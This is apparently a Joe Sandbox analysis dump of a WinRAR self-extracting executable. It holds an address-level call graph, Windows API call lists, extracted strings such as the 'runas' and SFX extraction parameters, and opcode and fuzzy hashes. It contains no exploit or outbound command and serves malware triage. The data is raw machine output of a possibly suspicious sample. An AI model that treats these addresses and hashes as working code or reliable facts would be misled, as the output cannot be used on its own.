28522->28423 28523->28422 28525 7ff64d352c90 28524->28525 28541 7ff64d35ce54 28525->28541 28527 7ff64d352c9c 28547 7ff64d352848 28527->28547 28529 7ff64d352cb4 _RTC_Initialize 28539 7ff64d352d09 28529->28539 28552 7ff64d3529f8 28529->28552 28531 7ff64d352d35 28531->28427 28533 7ff64d352cc9 28555 7ff64d35c2c0 28533->28555 28540 7ff64d352d25 28539->28540 28584 7ff64d353170 7 API calls 2 library calls 28539->28584 28540->28427 28542 7ff64d35ce65 28541->28542 28546 7ff64d35ce6d 28542->28546 28585 7ff64d35d69c 15 API calls abort 28542->28585 28544 7ff64d35ce7c 28586 7ff64d3578e4 31 API calls _invalid_parameter_noinfo_noreturn 28544->28586 28546->28527 28548 7ff64d352859 28547->28548 28551 7ff64d35285e __scrt_acquire_startup_lock 28547->28551 28548->28551 28587 7ff64d353170 7 API calls 2 library calls 28548->28587 28550 7ff64d3528d2 28551->28529 28588 7ff64d3529bc 28552->28588 28554 7ff64d352a01 28554->28533 28556 7ff64d35c2f4 28555->28556 28557 7ff64d35c2de 28555->28557 28558 7ff64d360730 48 API calls 28556->28558 28593 7ff64d35d69c 15 API calls abort 28557->28593 28561 7ff64d35c2f9 GetModuleFileNameA 28558->28561 28560 7ff64d35c2e3 28594 7ff64d3578e4 31 API calls _invalid_parameter_noinfo_noreturn 28560->28594 28563 7ff64d35c326 28561->28563 28595 7ff64d35c0a0 35 API calls 28563->28595 28564 7ff64d352cd5 28564->28539 28583 7ff64d353480 InitializeSListHead 28564->28583 28566 7ff64d35c350 28596 7ff64d35c25c 15 API calls 2 library calls 28566->28596 28568 7ff64d35c366 28569 7ff64d35c37f 28568->28569 28570 7ff64d35c36e 28568->28570 28598 7ff64d35c0a0 35 API calls 28569->28598 28597 7ff64d35d69c 15 API calls abort 28570->28597 28573 7ff64d35d90c __free_lconv_mon 15 API calls 28573->28564 28574 7ff64d35c39b 28575 7ff64d35c3cb 28574->28575 28576 7ff64d35c3e4 28574->28576 28580 7ff64d35c373 28574->28580 28577 7ff64d35d90c __free_lconv_mon 15 API calls 28575->28577 28578 7ff64d35d90c __free_lconv_mon 15 API calls 28576->28578 28579 7ff64d35c3d4 28577->28579 28578->28580 28581 7ff64d35d90c __free_lconv_mon 15 API calls 28579->28581 28580->28573 28582 7ff64d35c3e0 28581->28582 28582->28564 28584->28531 28585->28544 28586->28546 28587->28550 28589 7ff64d3529d6 28588->28589 28591 7ff64d3529cf 28588->28591 28592 7ff64d35caa0 34 API calls 28589->28592 28591->28554 28592->28591 28593->28560 28594->28564 28595->28566 28596->28568 28597->28580 28598->28574 28600 7ff64d3291c8 35 API calls 28599->28600 28601 7ff64d321130 28600->28601 28602 7ff64d3529bc 34 API calls 28601->28602 28603 7ff64d352a01 28602->28603 28603->28431 28604->28438 28736 7ff64d352450 28605->28736 28608 7ff64d33e026 GetProcAddress 28610 7ff64d33e03b 28608->28610 28611 7ff64d33e053 GetProcAddress 28608->28611 28609 7ff64d33e07b 28612 7ff64d33e503 28609->28612 28743 7ff64d35b788 39 API calls _snwprintf 28609->28743 28610->28611 28611->28609 28615 7ff64d33e068 28611->28615 28614 7ff64d336454 34 API calls 28612->28614 28617 7ff64d33e50c 28614->28617 28615->28609 28616 7ff64d33e3b0 28616->28612 28618 7ff64d33e3ba 28616->28618 28619 7ff64d337df4 47 API calls 28617->28619 28620 7ff64d336454 34 API calls 28618->28620 28649 7ff64d33e51a 28619->28649 28621 7ff64d33e3c3 CreateFileW 28620->28621 28622 7ff64d33e4f0 CloseHandle 28621->28622 28623 7ff64d33e403 SetFilePointer 28621->28623 28626 7ff64d321fa0 31 API calls 28622->28626 28623->28622 28625 7ff64d33e41c ReadFile 28623->28625 28625->28622 28627 7ff64d33e444 28625->28627 28626->28612 28628 7ff64d33e458 28627->28628 28629 7ff64d33e800 28627->28629 28634 7ff64d32129c 33 API calls 28628->28634 28749 7ff64d352624 8 API calls 28629->28749 28631 7ff64d33e53e CompareStringW 28631->28649 28632 7ff64d32129c 33 API calls 28632->28649 28633 7ff64d33e805 28639 7ff64d33e48f 28634->28639 28635 7ff64d338090 47 API calls 28635->28649 28637 7ff64d33e63a 28640 7ff64d33e648 28637->28640 28641 7ff64d33e7c2 28637->28641 28638 7ff64d321fa0 31 API calls 28638->28649 28642 7ff64d33e4db 28639->28642 28744 7ff64d33d0a0 33 API calls 28639->28744 28745 7ff64d337eb0 47 API calls 28640->28745 28644 7ff64d321fa0 31 API calls 28641->28644 28646 7ff64d321fa0 31 API calls 28642->28646 28648 7ff64d33e7cb 28644->28648 28645 7ff64d3332bc 51 API calls 28645->28649 28650 7ff64d33e4e5 28646->28650 28647 7ff64d33e651 28651 7ff64d3351a4 9 API calls 28647->28651 28653 7ff64d321fa0 31 API calls 28648->28653 28649->28631 28649->28632 28649->28635 28649->28638 28649->28645 28667 7ff64d33e5cc 28649->28667 28738 7ff64d3351a4 28649->28738 28654 7ff64d321fa0 31 API calls 28650->28654 28655 7ff64d33e656 28651->28655 28652 7ff64d32129c 33 API calls 28652->28667 28656 7ff64d33e7d5 28653->28656 28654->28622 28657 7ff64d33e706 28655->28657 28664 7ff64d33e661 28655->28664 28659 7ff64d352320 _handle_error 8 API calls 28656->28659 28660 7ff64d33da98 48 API calls 28657->28660 28658 7ff64d338090 47 API calls 28658->28667 28661 7ff64d33e7e4 28659->28661 28662 7ff64d33e74b AllocConsole 28660->28662 28661->28444 28665 7ff64d33e6fb 28662->28665 28666 7ff64d33e755 GetCurrentProcessId AttachConsole 28662->28666 28663 7ff64d321fa0 31 API calls 28663->28667 28671 7ff64d33aae0 48 API calls 28664->28671 28748 7ff64d3219e0 31 API calls _invalid_parameter_noinfo_noreturn 28665->28748 28668 7ff64d33e76c 28666->28668 28667->28637 28667->28652 28667->28658 28667->28663 28669 7ff64d3332bc 51 API calls 28667->28669 28675 7ff64d33e778 GetStdHandle WriteConsoleW Sleep FreeConsole 28668->28675 28669->28667 28673 7ff64d33e6a5 28671->28673 28672 7ff64d33e7b9 ExitProcess 28674 7ff64d33da98 48 API calls 28673->28674 28676 7ff64d33e6c3 28674->28676 28675->28665 28677 7ff64d33aae0 48 API calls 28676->28677 28678 7ff64d33e6ce 28677->28678 28746 7ff64d33dc2c 33 API calls 28678->28746 28680 7ff64d33e6da 28747 7ff64d3219e0 31 API calls _invalid_parameter_noinfo_noreturn 28680->28747 28683 7ff64d33dd88 28682->28683 28684 7ff64d349481 OleInitialize 28683->28684 28685 7ff64d3494a7 28684->28685 28686 7ff64d3494cd SHGetMalloc 28685->28686 28686->28447 28688 7ff64d349a49 28687->28688 28691 7ff64d349a4e memcpy_s 28687->28691 28689 7ff64d321fa0 31 API calls 28688->28689 28689->28691 28690 7ff64d321fa0 31 API calls 28692 7ff64d349a7d memcpy_s 28690->28692 28691->28690 28691->28692 28693 7ff64d321fa0 31 API calls 28692->28693 28694 7ff64d349aac memcpy_s 28692->28694 28693->28694 28695 7ff64d321fa0 31 API calls 28694->28695 28696 7ff64d349adb memcpy_s 28694->28696 28695->28696 28696->28449 28698 7ff64d34b046 28697->28698 28699 7ff64d34b03e 28697->28699 28701 7ff64d34b063 28698->28701 28702 7ff64d34b04e GetObjectW 28698->28702 28750 7ff64d348624 FindResourceW 28699->28750 28703 7ff64d34849c 4 API calls 28701->28703 28702->28701 28704 7ff64d34b078 28703->28704 28705 7ff64d34b0ce 28704->28705 28706 7ff64d34b09e 28704->28706 28707 7ff64d348624 10 API calls 28704->28707 28716 7ff64d3398ac 28705->28716 28764 7ff64d348504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28706->28764 28709 7ff64d34b08a 28707->28709 28709->28706 28711 7ff64d34b092 DeleteObject 28709->28711 28710 7ff64d34b0a7 28712 7ff64d3484cc 4 API calls 28710->28712 28711->28706 28713 7ff64d34b0b2 28712->28713 28765 7ff64d348df4 16 API calls _handle_error 28713->28765 28715 7ff64d34b0bf DeleteObject 28715->28705 28766 7ff64d3398dc 28716->28766 28718 7ff64d3398ba 28833 7ff64d33a43c GetModuleHandleW FindResourceW 28718->28833 28720 7ff64d3398c2 28720->28477 28722 7ff64d3521d0 33 API calls 28721->28722 28723 7ff64d3467fa 28722->28723 28723->28486 28725 7ff64d349501 28724->28725 28726 7ff64d34950a OleUninitialize 28725->28726 28727 7ff64d38e330 28726->28727 28728->28467 28729->28485 28730->28490 28731->28494 28732->28497 28733->28487 28734->28503 28735->28512 28737 7ff64d33dff4 GetModuleHandleW 28736->28737 28737->28608 28737->28609 28739 7ff64d3351c8 GetVersionExW 28738->28739 28740 7ff64d3351fb 28738->28740 28739->28740 28741 7ff64d352320 _handle_error 8 API calls 28740->28741 28742 7ff64d335228 28741->28742 28742->28649 28743->28616 28744->28639 28745->28647 28746->28680 28747->28665 28748->28672 28749->28633 28751 7ff64d34879b 28750->28751 28752 7ff64d34864f SizeofResource 28750->28752 28751->28698 28752->28751 28753 7ff64d348669 LoadResource 28752->28753 28753->28751 28754 7ff64d348682 LockResource 28753->28754 28754->28751 28755 7ff64d348697 GlobalAlloc 28754->28755 28755->28751 28756 7ff64d3486b8 GlobalLock 28755->28756 28757 7ff64d348792 GlobalFree 28756->28757 28758 7ff64d3486ca memcpy_s 28756->28758 28757->28751 28759 7ff64d3486f6 GdipAlloc 28758->28759 28760 7ff64d348789 GlobalUnlock 28758->28760 28761 7ff64d34870b 28759->28761 28760->28757 28761->28760 28762 7ff64d34875a GdipCreateHBITMAPFromBitmap 28761->28762 28763 7ff64d348772 28761->28763 28762->28763 28763->28760 28764->28710 28765->28715 28769 7ff64d3398fe _snwprintf 28766->28769 28767 7ff64d339973 28843 7ff64d3368b0 48 API calls 28767->28843 28769->28767 28770 7ff64d339a89 28769->28770 28772 7ff64d3399fd 28770->28772 28774 7ff64d3220b0 33 API calls 28770->28774 28771 7ff64d321fa0 31 API calls 28771->28772 28776 7ff64d3324c0 54 API calls 28772->28776 28773 7ff64d33997d memcpy_s 28773->28771 28831 7ff64d33a42e 28773->28831 28774->28772 28775 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28777 7ff64d33a434 28775->28777 28778 7ff64d339a1a 28776->28778 28780 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28777->28780 28779 7ff64d339a22 28778->28779 28787 7ff64d339aad 28778->28787 28783 7ff64d33204c 100 API calls 28779->28783 28781 7ff64d33a43a 28780->28781 28782 7ff64d339b17 28835 7ff64d35a450 28782->28835 28785 7ff64d339a2b 28783->28785 28785->28777 28788 7ff64d339a66 28785->28788 28787->28782 28789 7ff64d338e58 33 API calls 28787->28789 28791 7ff64d352320 _handle_error 8 API calls 28788->28791 28789->28787 28790 7ff64d35a450 31 API calls 28803 7ff64d339b57 __vcrt_InitializeCriticalSectionEx 28790->28803 28792 7ff64d33a40e 28791->28792 28792->28718 28793 7ff64d339c89 28794 7ff64d332aa0 101 API calls 28793->28794 28806 7ff64d339d5c 28793->28806 28797 7ff64d339ca1 28794->28797 28795 7ff64d332bb0 101 API calls 28795->28803 28796 7ff64d3328d0 104 API calls 28796->28803 28800 7ff64d3328d0 104 API calls 28797->28800 28797->28806 28798 7ff64d33204c 100 API calls 28801 7ff64d33a3f5 28798->28801 28799 7ff64d332aa0 101 API calls 28799->28803 28804 7ff64d339cc9 28800->28804 28802 7ff64d321fa0 31 API calls 28801->28802 28802->28788 28803->28793 28803->28795 28803->28796 28803->28799 28803->28806 28804->28806 28812 7ff64d339cd7 __vcrt_InitializeCriticalSectionEx 28804->28812 28844 7ff64d340bbc MultiByteToWideChar 28804->28844 28806->28798 28807 7ff64d33a1ec 28818 7ff64d33a2c2 28807->28818 28850 7ff64d35cf90 31 API calls 2 library calls 28807->28850 28809 7ff64d33a157 28809->28807 28847 7ff64d35cf90 31 API calls 2 library calls 28809->28847 28810 7ff64d33a14b 28810->28718 28812->28806 28812->28807 28812->28809 28812->28810 28825 7ff64d340f68 WideCharToMultiByte 28812->28825 28828 7ff64d33a429 28812->28828 28845 7ff64d33aa88 45 API calls _snwprintf 28812->28845 28846 7ff64d35a270 31 API calls 2 library calls 28812->28846 28814 7ff64d33a3a2 28819 7ff64d35a450 31 API calls 28814->28819 28815 7ff64d33a249 28851 7ff64d35b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28815->28851 28816 7ff64d33a16d 28848 7ff64d35b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28816->28848 28817 7ff64d33a2ae 28817->28818 28852 7ff64d338cd0 33 API calls 2 library calls 28817->28852 28818->28814 28820 7ff64d338e58 33 API calls 28818->28820 28822 7ff64d33a3cb 28819->28822 28820->28818 28824 7ff64d35a450 31 API calls 28822->28824 28824->28806 28825->28812 28826 7ff64d33a1d8 28826->28807 28849 7ff64d338cd0 33 API calls 2 library calls 28826->28849 28853 7ff64d352624 8 API calls 28828->28853 28831->28775 28834 7ff64d33a468 28833->28834 28834->28720 28836 7ff64d35a47d 28835->28836 28842 7ff64d35a492 28836->28842 28854 7ff64d35d69c 15 API calls abort 28836->28854 28838 7ff64d35a487 28855 7ff64d3578e4 31 API calls _invalid_parameter_noinfo_noreturn 28838->28855 28839 7ff64d352320 _handle_error 8 API calls 28841 7ff64d339b37 28839->28841 28841->28790 28842->28839 28843->28773 28844->28812 28845->28812 28846->28812 28847->28816 28848->28826 28849->28807 28850->28815 28851->28817 28852->28818 28853->28831 28854->28838 28855->28842 28899 7ff64d350df5 14 API calls _com_raise_error 28856 7ff64d35bf2c 28863 7ff64d35bc34 28856->28863 28868 7ff64d35d440 GetLastError 28863->28868 28865 7ff64d35bc3f 28889 7ff64d35d068 35 API calls abort 28865->28889 28869 7ff64d35d46a 28868->28869 28870 7ff64d35d45d 28868->28870 28891 7ff64d35fa04 15 API calls 2 library calls 28869->28891 28890 7ff64d35f664 6 API calls __vcrt_uninitialize_ptd 28870->28890 28873 7ff64d35d462 28873->28869 28875 7ff64d35d4ab 28873->28875 28874 7ff64d35d479 28876 7ff64d35d481 28874->28876 28892 7ff64d35f6bc 6 API calls __vcrt_uninitialize_ptd 28874->28892 28878 7ff64d35d4c6 SetLastError 28875->28878 28879 7ff64d35d4b0 SetLastError 28875->28879 28882 7ff64d35d90c __free_lconv_mon 15 API calls 28876->28882 28894 7ff64d35d068 35 API calls abort 28878->28894 28879->28865 28880 7ff64d35d498 28880->28876 28884 7ff64d35d49f 28880->28884 28883 7ff64d35d488 28882->28883 28883->28878 28893 7ff64d35d1f0 15 API calls abort 28884->28893 28887 7ff64d35d4a4 28888 7ff64d35d90c __free_lconv_mon 15 API calls 28887->28888 28888->28875 28890->28873 28891->28874 28892->28880 28893->28887 25984 7ff64d3511cf 25985 7ff64d351102 25984->25985 25986 7ff64d351900 _com_raise_error 14 API calls 25985->25986 25987 7ff64d351141 25986->25987 28365 7ff64d3503e0 28366 7ff64d350497 28365->28366 28367 7ff64d35041f 28365->28367 28368 7ff64d33aae0 48 API calls 28366->28368 28369 7ff64d33aae0 48 API calls 28367->28369 28370 7ff64d3504ab 28368->28370 28371 7ff64d350433 28369->28371 28372 7ff64d33da98 48 API calls 28370->28372 28373 7ff64d33da98 48 API calls 28371->28373 28379 7ff64d350442 memcpy_s 28372->28379 28373->28379 28374 7ff64d321fa0 31 API calls 28375 7ff64d350541 28374->28375 28376 7ff64d32250c SetDlgItemTextW 28375->28376 28381 7ff64d350556 SetDlgItemTextW 28376->28381 28377 7ff64d3505cc 28380 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28377->28380 28378 7ff64d3505c6 28382 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28378->28382 28379->28374 28379->28377 28379->28378 28383 7ff64d3505d2 28380->28383 28384 7ff64d35056f 28381->28384 28385 7ff64d35059c 28381->28385 28382->28377 28384->28385 28387 7ff64d3505c1 28384->28387 28386 7ff64d352320 _handle_error 8 API calls 28385->28386 28388 7ff64d3505af 28386->28388 28389 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28387->28389 28389->28378 28900 7ff64d3520f0 28901 7ff64d352106 _com_error::_com_error 28900->28901 28902 7ff64d354078 std::_Xinvalid_argument 2 API calls 28901->28902 28903 7ff64d352117 28902->28903 28904 7ff64d351900 _com_raise_error 14 API calls 28903->28904 28905 7ff64d352163 28904->28905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                          • API String ID: 3303814210-2702805183
                          • Opcode ID: 37539dee0de0f8605dc8fdad2644b0fa5e272ae0c210a86a0140fc28e7c4c48a
                          • Instruction ID: 42afed13912e44efe8e537058b895f525c50a5ae2b935147729a91939920a335
                          • Opcode Fuzzy Hash: 37539dee0de0f8605dc8fdad2644b0fa5e272ae0c210a86a0140fc28e7c4c48a
                          • Instruction Fuzzy Hash: 3DD2A362E0D68291EA22FB25E8542F9E3A1EF87B84F404231D94DC76A5FF3DE544C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                          • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                          • API String ID: 1830998149-3916287355
                          • Opcode ID: 2de75c9eefce9664ca3b6fbf1c6f62ef658c31bfe8ff5daa0510ddde276262ad
                          • Instruction ID: c1e3260c99b611ede8402a924edc2e8a966f3ca79918a8ab566e5983e2668cd3
                          • Opcode Fuzzy Hash: 2de75c9eefce9664ca3b6fbf1c6f62ef658c31bfe8ff5daa0510ddde276262ad
                          • Instruction Fuzzy Hash: 5A13AE62E0CB8299EB12FF64D8802EC67B1EB46798F501535DA1D97AD9EF3CE584C340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1466 7ff64d350754-7ff64d350829 call 7ff64d33dfd0 call 7ff64d3362dc call 7ff64d34946c call 7ff64d353cf0 call 7ff64d349a14 1477 7ff64d35082b-7ff64d350840 1466->1477 1478 7ff64d350860-7ff64d350883 1466->1478 1479 7ff64d35085b call 7ff64d35220c 1477->1479 1480 7ff64d350842-7ff64d350855 1477->1480 1481 7ff64d3508ba-7ff64d3508dd 1478->1481 1482 7ff64d350885-7ff64d35089a 1478->1482 1479->1478 1480->1479 1485 7ff64d350ddd-7ff64d350de2 call 7ff64d357904 1480->1485 1483 7ff64d350914-7ff64d350937 1481->1483 1484 7ff64d3508df-7ff64d3508f4 1481->1484 1487 7ff64d35089c-7ff64d3508af 1482->1487 1488 7ff64d3508b5 call 7ff64d35220c 1482->1488 1491 7ff64d350939-7ff64d35094e 1483->1491 1492 7ff64d35096e-7ff64d35097a GetCommandLineW 1483->1492 1489 7ff64d3508f6-7ff64d350909 1484->1489 1490 7ff64d35090f call 7ff64d35220c 1484->1490 1503 7ff64d350de3-7ff64d350df0 call 7ff64d357904 1485->1503 1487->1485 1487->1488 1488->1481 1489->1485 1489->1490 1490->1483 1496 7ff64d350969 call 7ff64d35220c 1491->1496 1497 7ff64d350950-7ff64d350963 1491->1497 1499 7ff64d350b47-7ff64d350b5e call 7ff64d336454 1492->1499 1500 7ff64d350980-7ff64d3509b7 call 7ff64d35797c call 7ff64d32129c call 7ff64d34cad0 1492->1500 1496->1492 1497->1485 1497->1496 1508 7ff64d350b89-7ff64d350ce4 call 7ff64d321fa0 SetEnvironmentVariableW GetLocalTime call 7ff64d333e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff64d34b014 call 7ff64d3398ac call 7ff64d3467b4 * 2 DialogBoxParamW call 7ff64d3468a8 * 2 1499->1508 1509 7ff64d350b60-7ff64d350b85 call 7ff64d321fa0 call 7ff64d353640 1499->1509 1524 7ff64d3509ec-7ff64d3509f3 1500->1524 1525 7ff64d3509b9-7ff64d3509cc 1500->1525 1514 7ff64d350df5-7ff64d350e2f call 7ff64d351900 1503->1514 1573 7ff64d350cec-7ff64d350cf3 1508->1573 1574 7ff64d350ce6 Sleep 1508->1574 1509->1508 1521 7ff64d350e34-7ff64d350e81 1514->1521 1521->1514 1531 7ff64d350adb-7ff64d350b12 call 7ff64d35797c call 7ff64d32129c call 7ff64d34fd0c 1524->1531 1532 7ff64d3509f9-7ff64d350a13 OpenFileMappingW 1524->1532 1529 7ff64d3509e7 call 7ff64d35220c 1525->1529 1530 7ff64d3509ce-7ff64d3509e1 1525->1530 1529->1524 1530->1503 1530->1529 1531->1499 1556 7ff64d350b14-7ff64d350b27 1531->1556 1537 7ff64d350a19-7ff64d350a39 MapViewOfFile 1532->1537 1538 7ff64d350ad0-7ff64d350ad9 CloseHandle 1532->1538 1537->1538 1541 7ff64d350a3f-7ff64d350a6f UnmapViewOfFile MapViewOfFile 1537->1541 1538->1499 1541->1538 1545 7ff64d350a71-7ff64d350aca call 7ff64d34a190 call 7ff64d34fd0c call 7ff64d33b9b4 call 7ff64d33bb00 call 7ff64d33bb70 UnmapViewOfFile 1541->1545 1545->1538 1559 7ff64d350b29-7ff64d350b3c 1556->1559 1560 7ff64d350b42 call 7ff64d35220c 1556->1560 1559->1560 1563 7ff64d350dd7-7ff64d350ddc call 7ff64d357904 1559->1563 1560->1499 1563->1485 1576 7ff64d350cfa-7ff64d350d1d call 7ff64d33b8e0 DeleteObject 1573->1576 1577 7ff64d350cf5 call 7ff64d349f4c 1573->1577 1574->1573 1581 7ff64d350d25-7ff64d350d2c 1576->1581 1582 7ff64d350d1f DeleteObject 1576->1582 1577->1576 1583 7ff64d350d48-7ff64d350d59 1581->1583 1584 7ff64d350d2e-7ff64d350d35 1581->1584 1582->1581 1586 7ff64d350d5b-7ff64d350d67 call 7ff64d34fe24 CloseHandle 1583->1586 1587 7ff64d350d6d-7ff64d350d7a 1583->1587 1584->1583 1585 7ff64d350d37-7ff64d350d43 call 7ff64d32ba0c 1584->1585 1585->1583 1586->1587 1590 7ff64d350d7c-7ff64d350d89 1587->1590 1591 7ff64d350d9f-7ff64d350da4 call 7ff64d3494e4 1587->1591 1594 7ff64d350d8b-7ff64d350d93 1590->1594 1595 7ff64d350d99-7ff64d350d9b 1590->1595 1596 7ff64d350da9-7ff64d350dd6 call 7ff64d352320 1591->1596 1594->1591 1597 7ff64d350d95-7ff64d350d97 1594->1597 1595->1591 1598 7ff64d350d9d 1595->1598 1597->1591 1598->1591
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                          • API String ID: 1048086575-3710569615
                          • Opcode ID: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
                          • Instruction ID: ab2d4cfaf138dceadc1d53f3d318ea9827f2d36f4636e851872a370c7bcadd63
                          • Opcode Fuzzy Hash: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
                          • Instruction Fuzzy Hash: 3A127461E1DB8281EB12BF25E8552B9E3A1FF86784F404231E99DC6AA5FF3DE144C300

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                          • String ID: $%s:$CAPTION
                          • API String ID: 1936833115-404845831
                          • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                          • Instruction ID: 6ff3eb7e5accfe6ed95379d04a3090e3b61c7f201590f329f57b43cc5907ebe0
                          • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                          • Instruction Fuzzy Hash: 9191E332F1C64186E719BF29E80066AE7A1FB86784F505535EE4D97B98EF3DE805CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: __tmp_reference_source_
                          • API String ID: 3668304517-685763994
                          • Opcode ID: 9bcb2e275ed03a8d7aba150d2a16dff366c135dca2d4fe69d6366dd8b3466e57
                          • Instruction ID: 61152ad2746de184e573091703de99cdc454af3c078c8ffecdd13581db36ceda
                          • Opcode Fuzzy Hash: 9bcb2e275ed03a8d7aba150d2a16dff366c135dca2d4fe69d6366dd8b3466e57
